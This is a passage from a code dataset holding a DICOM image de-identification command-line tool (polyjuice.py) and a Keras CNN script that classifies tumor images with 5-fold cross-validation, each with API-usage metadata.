{"api_name": "matplotlib.pyplot.ylabel", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figtext", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 66, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.meshgrid", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}]} +{"seq_id": "616784550", "text": "#!/usr/bin/env python3\n\nimport os\nimport os.path\nimport shutil\nimport yaml\nimport csv\nimport pydicom\nfrom pydicom import dcmread\nfrom docopt import docopt\nfrom poly_juice.lumberjack import Lumberjack\nfrom poly_juice.filch import DicomCaretaker\nfrom poly_juice.dicom_image import DicomImage\n\ndocstr = \"\"\"\nPolyjuice\nUsage:\n polyjuice.py (-h | --help)\n polyjuice.py [-vz] ( ) []\n polyjuice.py [-vzc] []\n\nOptions:\n -h --help Show this message and exit\n -z --zip Archives the output folder\n -v --verbose Give progress of program in terminal\n -c --config Use config file to get input and output paths\n\nInstructions:\n Run polyjuice on individual files, ISOs, or directories. 
This will give an\n ouput folder containing dicom files that have had their tags cleaned\n according to your standards set in the config file.\n\"\"\"\n\nCONFIG_PATH = ''\nINPUT_DIR = ''\nOUTPUT_DIR = ''\n_verbose = '--verbose'\n_zip_folder = '--zip'\n_use_config = '--config'\n\n\ndef get_config(config_path: str) -> dict:\n '''\n Read in the config file. If the config file is missing or the wrong\n format, exit the program.\n '''\n try:\n with open(config_path, 'r') as config_file:\n config = yaml.load(config_file.read(), Loader=yaml.FullLoader)\n except Exception as e:\n print(\"Error: Check config file\")\n exit(e)\n return config\n\n\ndef check_directory(out_dir: str) -> None:\n '''\n Check if directory exists. If not, create it.\n '''\n if not os.path.exists(out_dir):\n try:\n os.makedirs(out_dir)\n except Exception as e:\n raise e\n\n\ndef check_mag_field(editor: DicomCaretaker, output_file, value,\n log: Lumberjack) -> str:\n\n ds = dcmread(output_file)\n\n try:\n name = os.path.basename(output_file)\n working_message = \"Checking header on {}\".format(name)\n log(working_message)\n\n if ds.MagneticFieldStrength is not None:\n value = ds.MagneticFieldStrength\n except Exception:\n ds.MagneticFieldStrength = value\n ds.save_as(output_file)\n log(\"MagneticFieldStrength added for {}\".format(name))\n\n return value\n\n\ndef identify_output(editor: DicomCaretaker, working_file: str, out_dir: str,\n id_pairs: dict, log: Lumberjack) -> str:\n\n name = os.path.basename(working_file)\n with open(working_file, 'rb') as working_file:\n working_message = \"Working on {}\".format(name)\n log(working_message)\n image = DicomImage(working_file)\n\n id_issue = image.update_patient_id(id_pairs, log)\n if id_issue:\n editor.report_id(id_issue, log)\n\n folder_name = editor.get_folder_name(image)\n identified_folder = os.path.join(out_dir, folder_name)\n\n output_name = os.path.join(identified_folder, name)\n\n return output_name\n\n\ndef walk_directory(parent_file: str, out_dir: str, zip_dir: str,\n modifications: dict, id_pairs: dict, dicom_folders: list,\n log: Lumberjack) -> list:\n '''\n Walk through directories and send individual files to be cleaned.\n '''\n editor = DicomCaretaker()\n mag_field = ''\n\n if os.path.isfile(parent_file):\n try:\n if parent_file.endswith(\".iso\"):\n # Mount and unmount ISO\n new_parent_dir = editor.mount_iso(parent_file, out_dir)\n dicom_folders = walk_directory(new_parent_dir, out_dir,\n zip_dir, modifications,\n id_pairs, dicom_folders, log)\n editor.unmount_iso()\n else:\n # Send file to be cleaned\n first_file = parent_file\n output_file = identify_output(editor, parent_file, out_dir,\n id_pairs, log)\n dicom_folders = clean_files(editor, parent_file, out_dir,\n first_file, modifications,\n id_pairs, dicom_folders, log)\n mag_field = check_mag_field(editor, output_file, mag_field, log)\n except Exception as e:\n print(\"{} failed\".format(parent_file))\n print(str(e))\n failure_message = \"{} failed\".format(parent_file) + \"\\n\" + str(e)\n log(failure_message)\n\n else:\n for path, subdirs, files in os.walk(parent_file):\n first_file = ''\n for name in files:\n path_message = os.path.join(path, name)\n log(path_message)\n try:\n check_file_type = os.path.join(path, name)\n working_file = os.path.join(path, name)\n if check_file_type.endswith(\".iso\"):\n # Mount and Unmount ISO\n new_parent_dir = editor.mount_iso(working_file,\n out_dir)\n dicom_folders = walk_directory(new_parent_dir, out_dir,\n zip_dir, modifications,\n id_pairs, dicom_folders,\n log)\n 
editor.unmount_iso()\n                    else:\n                        # Send file to be cleaned\n                        output_file = identify_output(editor, working_file,\n                                                      out_dir, id_pairs, log)\n                        if first_file == '':\n                            first_file = working_file\n                        dicom_folders = clean_files(editor, working_file, out_dir,\n                                                    first_file, modifications,\n                                                    id_pairs, dicom_folders, log)\n                        mag_field = check_mag_field(editor, output_file, mag_field, log)\n\n                except Exception as e:\n                    print(\"{} failed\".format(name))\n                    print(str(e))\n                    failure_message = \"{} failed\".format(name) + \"\\n\" + str(e)\n                    log(failure_message)\n    return dicom_folders\n\n\ndef clean_files(editor: DicomCaretaker, working_file: str, out_dir: str,\n                first_file: str,\n                modifications: dict, id_pairs: dict, dicom_folders: list,\n                log: Lumberjack) -> list:\n    '''\n    Use DicomCaretaker to clean files and find appropriate folders\n    to save the output\n    '''\n    try:\n        name = os.path.basename(working_file)\n        first_file_modified = get_modified_first_file(first_file)\n\n        with open(working_file, 'rb') as working_file:\n            image = DicomImage(working_file)\n\n            editor.scrub(image, modifications, id_pairs, log)\n\n            folder_name = editor.get_folder_name(image)\n            identified_folder = os.path.join(out_dir, folder_name)\n\n            check = os.path.join(folder_name, name)\n            if check in first_file or check in first_file_modified:\n                check_directory(identified_folder)\n                dicom_folders.append(identified_folder)\n\n            editor.save_output(image, identified_folder, name)\n            saving_message = \"Saved to {}\".format(identified_folder)\n            log(saving_message)\n\n    except Exception as e:\n        print(\"{} failed\".format(name))\n        failure_message = \"{} failed\".format(name) + \"\\n\" + str(e)\n        log(failure_message)\n    return dicom_folders\n\n\ndef zip_folder(dicom_folders: list, zip_dir: str, log: Lumberjack) -> None:\n    '''\n    Zip folders with cleaned DICOM images and\n    move them to zip directory specified in config file\n    '''\n    for folder in dicom_folders:\n        shutil.make_archive(folder, 'zip', folder)\n        zipped_message = \"{} archived\".format(folder)\n        log(zipped_message)\n\n        check_directory(zip_dir)\n        os.system(\"mv {}.zip {}\".format(folder, zip_dir))\n        move_zip_message = \"{} moved to {}\".format(folder, zip_dir)\n        log(move_zip_message)\n\n\ndef get_modified_first_file(first_file: str):\n    first_file_modified_arr = first_file.split('/')\n    in_folder_name = first_file_modified_arr[-2]\n    in_folder_arr = in_folder_name.split(\"_\")\n    in_folder_arr[0] = in_folder_arr[0].split(\"-\")[0]\n    first_file_modified_arr[-2] = \"_\".join(in_folder_arr)\n    first_file_modified = \"/\".join(first_file_modified_arr)\n    return first_file_modified\n\n\ndef main(args):\n    if not args[CONFIG_PATH]:\n        args[CONFIG_PATH] = 'poly_juice/config.yaml'\n\n    config = get_config(args[CONFIG_PATH])\n    modifications = config.get('modifications')\n\n    reset_IDS = config.get('new_IDs')\n    if reset_IDS is None:\n        reset_IDS = 'poly_juice/ids.csv'\n\n    # map folder IDs of the form (ptid-visit_no) down to the bare (ptid) by writing the pairs into ids.csv\n    input_root = ''\n\n    if args[_use_config]:\n        input_root = config.get('in_data_root')\n    else:\n        input_root = args[INPUT_DIR]\n    with open(reset_IDS, mode='a') as in_oldIDfile:\n        writer = csv.writer(in_oldIDfile, delimiter=\",\")\n        for path, subdirs, files in os.walk(input_root):\n            for folder in subdirs:\n                folder_name_arr = folder.split(\"_\")\n                ptid = folder_name_arr[0]\n                ptid_visit = ptid.split(\"-\")\n\n                if len(ptid_visit) > 1:\n                    writer.writerow([ptid, ptid_visit[0]])\n\n\n    try:\n        with open(reset_IDS, mode='r') as in_oldIDfile:\n            reader = csv.reader(in_oldIDfile)\n            
id_pairs = {rows[0]:rows[1] for rows in reader}\n except Exception as e:\n print(\"Check CSV. \\n\" + str(e))\n return\n\n if args[_zip_folder]:\n zip_dir = config.get('zip')\n print(\"zip folder \" + str(zip_dir))\n else:\n zip_dir = None\n\n verbose = args[_verbose]\n\n dicom_folders = []\n if args[_use_config]:\n # Get inputs/outputs from config file\n in_root = config.get('in_data_root')\n out_root = config.get('out_data_root')\n io_pairs = config.get('io_pairs')\n\n for io_pair in io_pairs:\n out_dir = os.path.join(out_root, io_pair['output'])\n check_directory(out_dir)\n log_path = os.path.join(out_dir, 'log.txt')\n log = Lumberjack(log_path, verbose)\n parent_file = os.path.join(in_root, io_pair['input'])\n dicom_folders = walk_directory(parent_file, out_dir, zip_dir,\n modifications, id_pairs,\n dicom_folders, log)\n\n else:\n # Loop through ISOs and subdirectories\n parent_file = args[INPUT_DIR]\n out_dir = args[OUTPUT_DIR]\n check_directory(out_dir)\n log_path = os.path.join(out_dir, 'log.txt')\n log = Lumberjack(log_path, verbose)\n dicom_folders = walk_directory(parent_file, out_dir, zip_dir,\n modifications, id_pairs, dicom_folders,\n log)\n\n if zip_dir:\n zip_folder(dicom_folders, zip_dir, log)\n\n\nif __name__ == '__main__':\n args = docopt(docstr)\n main(args)\n", "sub_path": "poly_juice/polyjuice.py", "file_name": "polyjuice.py", "file_ext": "py", "file_size_in_byte": 11465, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "yaml.load", "line_number": 49, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 62, "usage_type": "call"}, {"api_name": "poly_juice.filch.DicomCaretaker", "line_number": 67, "usage_type": "name"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 68, "usage_type": "name"}, {"api_name": "pydicom.dcmread", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "poly_juice.filch.DicomCaretaker", "line_number": 87, "usage_type": "name"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 88, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "poly_juice.dicom_image.DicomImage", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 110, "usage_type": "name"}, {"api_name": "poly_juice.filch.DicomCaretaker", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": 
"os.path.join", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path", "line_number": 148, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "poly_juice.filch.DicomCaretaker", "line_number": 178, "usage_type": "name"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 181, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path", "line_number": 187, "usage_type": "attribute"}, {"api_name": "poly_juice.dicom_image.DicomImage", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 198, "usage_type": "call"}, {"api_name": "os.path", "line_number": 198, "usage_type": "attribute"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 214, "usage_type": "name"}, {"api_name": "shutil.make_archive", "line_number": 220, "usage_type": "call"}, {"api_name": "os.system", "line_number": 225, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 259, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 260, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 272, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 294, "usage_type": "call"}, {"api_name": "os.path", "line_number": 294, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 296, "usage_type": "call"}, {"api_name": "os.path", "line_number": 296, "usage_type": "attribute"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 298, "usage_type": "call"}, {"api_name": "os.path", "line_number": 298, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 308, "usage_type": "call"}, {"api_name": "os.path", "line_number": 308, "usage_type": "attribute"}, {"api_name": "poly_juice.lumberjack.Lumberjack", "line_number": 309, "usage_type": "call"}, {"api_name": "docopt.docopt", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "69109983", "text": "# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nimport h5py\nfrom pathlib import Path\nimport os\n\nimport keras\nfrom keras import layers\nfrom keras import models\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\nfrom keras import regularizers\nfrom keras.layers import AveragePooling2D, MaxPooling2D\n\nfrom sklearn.model_selection import StratifiedKFold\nimport datetime\nfrom keras.models import save_model\nfrom tensorflow.python.keras.models import Model, load_model, save_model\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\nfrom sklearn.metrics import f1_score\n\nwd = os.getcwd()\nhdf5_dir = Path(wd + '/drive/My Drive/Colab Notebooks/Thesis/')\n\n#https://realpython.com/storing-images-in-python/#storing-with-hdf5\ndef read_many_hdf5(num_images):\n \"\"\" Reads image from HDF5.\n Parameters:\n ---------------\n num_images number of images to read\n\n Returns:\n ----------\n images images array, (N, 32, 32, 3) to be stored\n labels associated meta data, int label (N, 1)\n \"\"\"\n images, labels = [], []\n\n # Open the HDF5 file\n file = h5py.File(hdf5_dir / f\"{num_images}.h5\", \"r+\")\n\n images = 
np.array(file[\"/images\"]).astype(\"uint8\")\n labels = np.array(file[\"/meta\"]).astype(\"uint8\")\n\n return images, labels\n\n#Augmented data\nx_train, y_train = read_many_hdf5(2995)\nx_test, y_test = read_many_hdf5(40)\nx_val, y_val = read_many_hdf5(749)\n\n#Concatenate for k-fold cross validation\nx_trainz = np.concatenate((x_train, x_val))\ny_trainz = np.concatenate((y_train, y_val))\n\nx_train = x_trainz\ny_train = y_trainz\n\n\n\"\"\"## Normalizing the images.\"\"\"\nx_train = x_train.astype('float32')/255.\nx_test = x_test.astype('float32')/255.\n\n\n\"\"\"## What images do we have?\n\"\"\"\ndata_tumor_viz = x_train[:10]\ni = 0\nplt.figure(figsize = (25,25))\nfor image in data_tumor_viz:\n plt.subplot(4,5,i+1)\n i += 1\n plt.axis('off') # turning off the axes\n plt.imshow(image, cmap = 'gray')\n\nfor image in data_tumor_viz:\n print(image.shape)\n\nprint(\"We have\", sum(y_train==0),\"with no tumor in x_train and\", sum(y_train == 1), \"with a tumor\")\n\ndef model_1():\n adam = Adam(lr=0.0001) #LR of 0.001 LEADS TO OVERFITTING\n model = Sequential()\n model.add(layers.Conv2D(32,(4,4), activation = 'relu', input_shape = (224,224,3), name = 'conv1')) \n model.add(layers.MaxPooling2D((2, 2), name = 'maxpool1'))\n model.add(layers.Conv2D(64, (4,4), activation = 'relu', name = 'conv2'))\n model.add(layers.MaxPooling2D((2, 2), name = 'maxpool2'))\n model.add(layers.Flatten(name = 'flatten'))\n model.add(layers.Dense(64, activation = 'relu', kernel_regularizer=regularizers.l2(0.001), name = 'dense1'))\n #REMOVED BATCHNORM\n model.add(layers.Dropout(0.5, name = 'dropout'))\n model.add(layers.Dense(1, activation = 'sigmoid', name = 'dense2')) #SOFTMAX DOESNT TRAIN SOMEHOW, SO STICK WITH SIGMOID\n\t# Compile model\n model.compile(loss='binary_crossentropy', optimizer=adam, metrics=['accuracy'])\n return model\n \n\nmodel = model_1()\nmodel.summary()\n\nk = 5\nfolds = list(StratifiedKFold(n_splits=k, shuffle=True, random_state=1).split(x_train, y_train))\n\n\nimport os\nos.chdir('/content/drive/My Drive/Colab Notebooks/Submission 6dec thesis/')\n\ncvscores = []\nfor j, (train_idx, val_idx) in enumerate(folds,1):\n \n print('\\nFold ',j)\n X_train_cv = x_train[train_idx]\n y_train_cv = y_train[train_idx]\n X_valid_cv = x_train[val_idx]\n y_valid_cv= y_train[val_idx]\n \n model = model_1()\n history = model.fit(x_train[train_idx], y_train[train_idx], epochs=30, batch_size=32, validation_data = (X_valid_cv, y_valid_cv), shuffle = True)\n model.save('Model_1_fold_'+ str(j) + '.h5')\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.show()\n\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.show()\n scores = model.evaluate(X_valid_cv, y_valid_cv)\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n cvscores.append(scores[1] * 100)\nprint(\"%.2f%% (+/- %.2f%%)\" % (np.mean(cvscores), np.std(cvscores)))\n\n# Load the model from the best fold\nwd = os.getcwd()\n\nmodelfold1 = load_model('Model_1_fold_1.h5')\nmodelfold2 = load_model('Model_1_fold_2.h5')\nmodelfold3 = load_model('Model_1_fold_3.h5')\nmodelfold4 = load_model('Model_1_fold_4.h5')\nmodelfold5 = load_model('Model_1_fold_5.h5')\n\n\n\ndef multiple_predictions(test_data, list_of_models):\n predicts = []\n for i in 
list_of_models:\n predict_fold = i.predict(test_data)\n labeled = [1 if x > 0.5 else 0 for x in predict_fold]\n predicts.append(labeled)\n return predicts\n\ndef multiple_accuracies(test_labs, list_of_model_predictions):\n accuracies = []\n fold = 0\n for i in list_of_model_predictions:\n fold +=1\n accuracy = accuracy_score(test_labs, i)\n accuracies.append(accuracy)\n return accuracies\n\ndef multiple_conf_matrices(test_labs, list_of_model_predictions):\n confusions = []\n for i in list_of_model_predictions:\n confusion_mt = confusion_matrix(test_labs, i)\n confusions.append(confusion_mt)\n return confusions\n\ndef multiple_class_reports(test_labs, list_of_model_predictions):\n class_reps = []\n for i in list_of_model_predictions:\n class_rep = classification_report(test_labs, i)\n class_reps.append(class_rep)\n return class_reps\n\npreds = multiple_predictions(x_test, [modelfold1, modelfold2, modelfold3, modelfold4, modelfold5])\naccu = multiple_accuracies(y_test, preds)\nconf = multiple_conf_matrices(y_test, preds)\nclas = multiple_class_reports(y_test, preds)\n\nfold = 0\nfor i in accu:\n fold +=1\n print ('for fold', fold, 'the accuracy is', i)\nprint('the mean accuracy is ', round(np.mean(accu),2)*100, '%')\n\nfold = 0\nfor i in conf:\n fold +=1\n print('\\nfor fold', fold, 'the confusion matrix is\\n', i)\n\nfold = 0\nfor i in clas:\n fold +=1\n print('\\nfor fold', fold, 'the classification report is\\n', i )\n\nfrom sklearn.metrics import precision_score, recall_score\nprecscores = []\nrecscores = []\nf1scores = []\nfor i in preds:\n prec = precision_score(y_test, i)\n rec = recall_score(y_test,i)\n f1 = f1_score(y_test,i)\n precscores.append(prec)\n recscores.append(rec)\n f1scores.append(f1)\n \nprint(\"the average precision score is\", round(np.mean(precscores),2)*100, '%')\nprint(\"the average recall is\", round(np.mean(recscores),2)*100, '%')\nprint(\"the average F1 score is\", round(np.mean(f1scores),2)*100, '%')\n\n#Image classifications\ni = 0\nplt.figure(figsize = (25,25))\nfor image in x_test:\n plt.subplot(10,5,i+1)\n plt.axis('off') # turning off the axes\n plt.title(('Predicted', preds[i], 'real', y_test[i]))\n plt.imshow(image, cmap = 'gray')\n i += 1\n\n\n\n", "sub_path": "Thesis Janne/CNN/Model 1/CNN model_1 kfold.py", "file_name": "CNN model_1 kfold.py", "file_ext": "py", "file_size_in_byte": 6987, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.getcwd", "line_number": 27, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 79, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "keras.optimizers.Adam", "line_number": 87, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 88, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 89, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 89, "usage_type": "name"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 90, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 90, "usage_type": "name"}, {"api_name": "keras.layers.Conv2D", "line_number": 91, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 91, "usage_type": "name"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 92, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 92, "usage_type": "name"}, {"api_name": "keras.layers.Flatten", "line_number": 93, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 93, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 94, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 94, "usage_type": "name"}, {"api_name": "keras.regularizers.l2", "line_number": 94, "usage_type": "call"}, {"api_name": "keras.regularizers", "line_number": 94, "usage_type": "name"}, {"api_name": "keras.layers.Dropout", "line_number": 96, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 96, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 97, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 97, "usage_type": "name"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 107, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", 
"line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 143, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.models.load_model", "line_number": 148, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.models.load_model", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.models.load_model", "line_number": 150, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.models.load_model", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.models.load_model", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 169, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 176, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 196, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 213, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 214, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 226, "usage_type": "call"}, 